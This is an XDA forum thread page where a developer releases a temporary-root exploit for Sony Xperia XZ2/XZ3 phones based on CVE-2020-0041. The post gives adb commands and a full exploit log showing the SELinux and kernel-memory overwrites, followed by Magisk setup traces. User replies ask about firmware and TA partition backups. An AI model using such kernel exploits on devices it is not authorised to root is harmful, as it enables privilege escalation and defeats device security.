• Introducing XDA Computing: Discussion zones for Hardware, Software, and more!    Check it out!

[XZ2/XZ2c/XZ2p/XZ3] temp root exploit via CVE-2020-0041 including magisk setup

Search This thread

yangdongle

New member
May 14, 2012
3
0
@j4nn Can you build for the japan phone version .Such like sov38 so-05k sov37 , temp root is nesscessary for japan phone .if you want to use volte in my country !
 

Drie93

Member
May 5, 2013
30
3
Bekasi
Xperia XZ2
tried to disable dmverity😁




Failed miserably 🤣🤣🤣
 

Attachments

  • IMG20210321164844-picsay.jpg
    IMG20210321164844-picsay.jpg
    163.6 KB · Views: 146

fuyuchip

New member
May 31, 2019
2
0
Will it work with Xz2p Japanese version like Au,Softbank,Or Docomo ?
日本の端末の場合はそのままでは不可能なので
ROMを変える必要があります。

このIBEのH8116_Customized IBE_1313-3189_52.1.A.0.618_R3C.zipを入れてください
ただしこのROMを入れるとおサイフケータイなどの機能は使えなくなりますのでご注意ください

Mod Edit:

In the case of Japanese terminals, it is impossible as it is
You need to change the ROM.

Please include H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C.zip for this IBE
However, please note that if you insert this ROM, you will not be able to use functions such as Osaifu-Keitai.
 
Last edited by a moderator:

Sjll

Recognized Developer
Jun 4, 2017
521
613
Chongqing
I backup some partitions which are not included in stock firmware before/after unlocked.
 

Attachments

  • xz3-lock.zip
    321.9 KB · Views: 19
  • xz3-Unlock.zip
    324 KB · Views: 12
  • Like
Reactions: Sacktreter

Sacktreter

Member
Aug 24, 2015
33
26
I don't like English because I can't do it so well, so I translated into English with google Translator. Origin Message in German as spoiler

Are these the TA partitions and other important partitions that I need to back up to get the missing functions i lose by opening the boot loader?

I don't want to open my bootloader, so I've got good results with this version.

I have temporary root rights, unfortunately this only works for a few restarts and then the smartphone crashes continuously when I enter the last command "./magisk-start.sh -3".

- This is not a solution for daily use.

My goal is not to open the boot loader. But by the temporary root access I can install most root programs and set them as I need it. Adblock and so on...

Unfortunately, I have to do without the root firewall, but with NetGuard Firewall I can live without root.

Many advantages nevertheless arise: All other programs such as .B. Banking, PayPal run perfectly, Bravia works and all would be happy because no programs discover the root access because it is only temporary....

So we only need a reliable root access in order to make a modification to the system from time to time. But I can't always take my laptop with me to give root via the "adb-shell". You should be able to enter something about the terminal to get root for a short time. This is a solution I'm thinking about.

# Deutsch:
Sind das jetzt die TA-Partitionen und andere wichtige Partitionen, die ich sichern muss um die fehlenden Funktionen wieder zu erhalten, die ich durch die Öffnung des Bootloaders verliere.

Ich möchte meinen Bootlader nicht öffnen, darum bin ich mit dieser Version schon sehr weit gekommen.

Ich habe temporäre root Rechte, leider funktioniert das immer nur ein paar Neutstarts lang und dann stürzt das Smartphone kontinuierlich ab, wenn ich den letzten Befehl eingebe "./magisk-start.sh -3".
- Das ist keine Lösung für den täglichen Gebrauch.

Mein Ziel ist es, den Bootloader nicht zu öffnen. Aber durch den temporären root Zugriff kann ich die meisten Root Programme installieren und einstellen wie ich es brauche. Adblocker und andere.

Auf die Root-Firewall muss ich leider verzichten, aber mit NetGuard Firewall kann ich ohne Root leben.

Viele Vorteile ergeben sich trotzdem: Alle anderen Programme wie z.B. Banking, Paypal laufen perfekt, Bravia funktioniert und alle wären glücklich weil keine Programme den root Zugriff entdecken wenn er nur temporär ist....

Wir brauchen also nur einen zuverlässigen root Zugriff um ab und zu eine Modifikation am System vorzunehmen. Dafür kann ich aber nicht meinen Laptop immer mitnehmen um über die "adb-shell" root zu erteilen. Man sollte etwas über den Terminal eingeben können um kurz root zu erhalten. Über so eine Lösung sollten wir nachdenken
 
I brought my Xperia XZ2 (SOV37, Single SIM) few months ago, and I want to gain root access to backup my .TA partition, I'm currently run firmware ver 52.1.A.3.49 (Android 10, H8216 Firmware, I get this phone with the firmware)

1. Can I use this method to gain root access?
2. About the backing up .TA partition, I already try to backing up my TA partition using Sony Mobile Flasher by Androxyde (0.9.33.0), it was backing up sucessfully but I'm doubt if I on the right track (I see 2 backup .TA, 1.ta (the TA Partition 1) and 2.ta (the TA Partition 2), 12kB and 837kB). I also try using NewFlasher (also get the 2 .TA files, but in dump one, 436kB and 630kB), is there any "proper" way to backing up the .TA files before proceeding rooting or unlocking the bootloader?

Thanks in advance :D
 

MisterFynn

Member
Jan 19, 2018
39
1
I don't like English because I can't do it so well, so I translated into English with google Translator. Origin Message in German as spoiler


Are these the TA partitions and other important partitions that I need to back up to get the missing functions i lose by opening the boot loader?

I don't want to open my bootloader, so I've got good results with this version.

I have temporary root rights, unfortunately this only works for a few restarts and then the smartphone crashes continuously when I enter the last command "./magisk-start.sh -3".

- This is not a solution for daily use.

My goal is not to open the boot loader. But by the temporary root access I can install most root programs and set them as I need it. Adblock and so on...

Unfortunately, I have to do without the root firewall, but with NetGuard Firewall I can live without root.

Many advantages nevertheless arise: All other programs such as .B. Banking, PayPal run perfectly, Bravia works and all would be happy because no programs discover the root access because it is only temporary....

So we only need a reliable root access in order to make a modification to the system from time to time. But I can't always take my laptop with me to give root via the "adb-shell". You should be able to enter something about the terminal to get root for a short time. This is a solution I'm thinking about.

# Deutsch:
Sind das jetzt die TA-Partitionen und andere wichtige Partitionen, die ich sichern muss um die fehlenden Funktionen wieder zu erhalten, die ich durch die Öffnung des Bootloaders verliere.

Ich möchte meinen Bootlader nicht öffnen, darum bin ich mit dieser Version schon sehr weit gekommen.

Ich habe temporäre root Rechte, leider funktioniert das immer nur ein paar Neutstarts lang und dann stürzt das Smartphone kontinuierlich ab, wenn ich den letzten Befehl eingebe "./magisk-start.sh -3".
- Das ist keine Lösung für den täglichen Gebrauch.

Mein Ziel ist es, den Bootloader nicht zu öffnen. Aber durch den temporären root Zugriff kann ich die meisten Root Programme installieren und einstellen wie ich es brauche. Adblocker und andere.

Auf die Root-Firewall muss ich leider verzichten, aber mit NetGuard Firewall kann ich ohne Root leben.

Viele Vorteile ergeben sich trotzdem: Alle anderen Programme wie z.B. Banking, Paypal laufen perfekt, Bravia funktioniert und alle wären glücklich weil keine Programme den root Zugriff entdecken wenn er nur temporär ist....

Wir brauchen also nur einen zuverlässigen root Zugriff um ab und zu eine Modifikation am System vorzunehmen. Dafür kann ich aber nicht meinen Laptop immer mitnehmen um über die "adb-shell" root zu erteilen. Man sollte etwas über den Terminal eingeben können um kurz root zu erhalten. Über so eine Lösung sollten wir nachdenken
Hay, I haven't tested it, but have you tried the app: Termux?

Maby it works, good luck.


Hay, ich habs nicht getestet, aber hast du es mal mit der App: Termux versucht?

Villeicht klappt es ja, viel glück.
 

mirhl

Senior Member
Oct 15, 2012
3,086
1,158
Friendly reminder I have a XZ2c holding back to October 2018 patch level for a reason.
 

junaid89

New member
Sep 12, 2010
2
0
I need to downgrade my XZ2P to H8116-52.1.A.0.618 so I can root it, can anybody provide it? Xperifirm only got the latest firmware
 

Nulwyn

Member
May 19, 2021
7
0
Hi!
My XZ2 is on version 52.1.A.3.49. Can I install UK firmware which is supported by this exploit even though fw on my phone is from Brazil carrier. Would it cause any problem at all?
 

Yosiaryan

New member
Jun 10, 2021
4
1
CHANGELOG
  • 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
  • 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
IMG_20210609_230852_164.jpg

i tried to use terminal emulator on android and tried it but i got this error " /sbin read-only" what should i do?
 

Yosiaryan

New member
Jun 10, 2021
4
1
thanks in advance for making this temproot work, sorry if my english is really bad. I'm trying to make a temproot Sony xz2 with a terminal emulator with a tutorial like Sony xz1
by pushing busybox and configuring it exactly like sony xz1 and managed to get into the root shell everything works normally no error but when i type ./magisk-start.sh -2 i get an error like this , can you help me find a solution for this problem ?
thank you very much
 

Attachments

  • IMG_20210609_230852_164.jpg
    IMG_20210609_230852_164.jpg
    109.9 KB · Views: 19

Yosiaryan

New member
Jun 10, 2021
4
1
terima kasih sebelumnya untuk membuat temproot ini berfungsi, maaf jika bahasa Inggris saya sangat buruk. Saya mencoba membuat temproot Sony xz2 dengan emulator terminal dengan tutorial seperti Sony xz1
dengan mendorong busybox dan mengonfigurasinya persis seperti sony xz1 dan berhasil masuk ke shell root semuanya berfungsi normal tidak ada kesalahan tetapi ketika saya mengetik ./magisk-start.sh -2 saya mendapatkan kesalahan seperti ini, dapatkah Anda membantu saya menemukan solusi untuk masalah ini?
Terima kasih banyak
 

Attachments

  • IMG_20210609_230852_164.jpg
    IMG_20210609_230852_164.jpg
    109.9 KB · Views: 7

Top Liked Posts

  • There are no posts matching your filters.
  • 31
    temp root exploit for sony xperia XZ2/XZ2c/XZ2p/XZ3 with android 10 firmware
    including temporal magisk setup from the exploit


    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit for kernel 4.9 that is used with sony TAMA platform phones running Android 10 with February 2020 security patch level.

    SUPPORTED TARGETS
    This has been tested only with xperia XZ2 H8216-52.1.A.0.618 target, but support for other targets have been implemented based on analysis of each kernel image from target firmware.
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

    USAGE HOWTO INCLUDING MAGISK SETUP
    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the tama-mroot.zip with the exploit attached in this post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push tama-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      Code:
      cd /data/local/tmp
      unzip tama-mroot.zip
      chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
      ./magisk-setup.sh
    • get temp root and start magisk up with following commands in 'adb shell':
      Code:
      cd /data/local/tmp
      ./tama-mroot
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3

    If it worked, you should see something like this:

    Code:
    H8216:/ $ cd /data/local/tmp
    H8216:/data/local/tmp $ ./tama-mroot                                                                                                                                                                            
    [+] Detected H8216-52.1.A.0.618 target
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffd07822fa00
    [+] file epitem at ffffffd102da6d00
    [+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
    [+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff9dee01ebf8
    [+] kernel base: ffffff9dece80000
    [+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
    [+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
    [+] init_cred: ffffff9def02fcd0
    [+] memstart_addr: 0xfffffff040000000
    [+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
    [+] Second level entry: ae419003 -> next table at ffffffd06e419000
    [+] sysctl_table_root = ffffff9def05c710
    [+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
    [+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
    [+] Injected sysctl node!
    [+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffd07822fa20
    [+] epitem.prev = ffffffd07822fad8
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                    
    + FRESH=false
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                    
    + FRESH=false
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=2
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + false
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14148
    + '[' -z 14148 ']'
    + >/sbin/.magisk/escalate
    + echo 14148
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                    
    + FRESH=false
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC=''
    + timeout=10
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14165
    + '[' -n 14165 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                      
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                              
    Permissive


    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
    The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot image, can result with a not anymore booting phone.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions - you would need to unlock bootloader for that.
    Some partitions might still be possible to modify - for example in case of sony xperia xz1 phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

    Please note, this exploit will get you a root shell with still locked TAMA platform phones that could allow to backup TA partition in still locked state, having drm keys (the device key) still there. Backup of TA partition now works with tama-mroot avoiding 'Required key not available' you could experience with previously released tama-root.
    There is currently no known method though how to restore drm functionalities after bootloader unlock even after restoring TA partition from the locked state backup.
    For details please check exploiting xperia XZ2 - good and bad news post and following discussion there.

    SOURCES
    Exploit sources for all releases are available at my github here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.
    Thank you very much to all who donate.

    DOWNLOAD
    7
    implemented magisk setup from temproot

    finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip - get it here
    5
    CHANGELOG
    • 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
    • 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
    5
    As it seems .618 fw versions get missing from xperifirm, please let me know if you need some - I still have following:
    H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
    H8166_Customized FR_1313-2540_52.1.A.0.618_R4C
    H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
    H8266_Customized FR_1313-2481_52.1.A.0.618_R4C
    H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
    H8314_Customized FR_1313-2468_52.1.A.0.618_R4C
    H8324_Customized FR_1313-2469_52.1.A.0.618_R2C
    H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
    H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
    H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
    so I may upload it on request.
    4
    So you did it again! You are insane mate!!
    Respect.